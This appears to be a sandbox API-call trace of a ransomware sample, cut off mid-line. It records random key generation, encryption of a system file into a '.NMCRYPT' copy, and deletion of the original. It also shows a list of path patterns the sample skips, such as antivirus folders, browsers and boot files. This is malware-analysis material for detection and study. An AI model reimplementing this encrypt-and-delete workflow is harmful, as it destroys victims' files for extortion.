[0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.571] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.572] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.572] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0153.572] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.572] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad478) returned 1 [0153.572] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.572] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.572] wcslen (_String="\\\\?\\") returned 0x4 [0153.572] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad778) returned 1 [0153.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.573] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=3072) returned 1 [0153.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.573] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.574] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.574] GetLastError () returned 0x0 [0153.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.575] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.575] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.575] GetLastError () returned 0x0 [0153.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.575] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.575] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.575] GetLastError () returned 0x0 [0153.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.575] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.576] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.576] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.576] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.576] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.576] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.576] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.576] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.576] GetLastError () returned 0x0 [0153.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.577] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.577] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.577] GetLastError () returned 0x0 [0153.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.577] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.577] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.577] GetLastError () returned 0x0 [0153.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.577] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.577] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui")) returned 0x20 [0153.577] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui", dwFileAttributes=0x20) returned 0 [0153.577] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 1 [0153.577] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui")) returned 0 [0153.578] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" [0153.578] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.578] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCAF8.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcaf8.tmp")) returned 0xcaf8 [0153.578] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCAF8.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcaf8.tmp"), dwFlags=0x1) returned 0 [0153.578] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCAF8.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcaf8.tmp")) returned 1 [0153.579] CryptDestroyKey (hKey=0x9ad778) returned 1 [0153.579] wcslen (_String="OK") returned 0x2 [0153.579] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.579] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.579] CryptDestroyKey (hKey=0x9ad478) returned 1 [0153.579] CryptDestroyHash (hHash=0x9ad278) returned 1 [0153.579] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0153.579] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*NMCRYPT") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.exe") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.dll") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.lnk") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.bat") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.ini") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.msi") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*.scf") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*AppData*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\java\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\windows\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*Atheros*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*Realtek*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*bootmgr*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*boot*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*boot*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*IO.SYS*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.579] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*ntldr*") returned 0 [0153.580] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*chrome*") returned 0 [0153.580] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*opera*") returned 0 [0153.580] PathMatchSpecW (pszFile="TipRes.dll.mui", pszSpec="*firefox*") returned 0 [0153.580] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", pszSpec="*") returned 1 [0153.580] strlen (_Str="NMoreira") returned 0x8 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.580] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 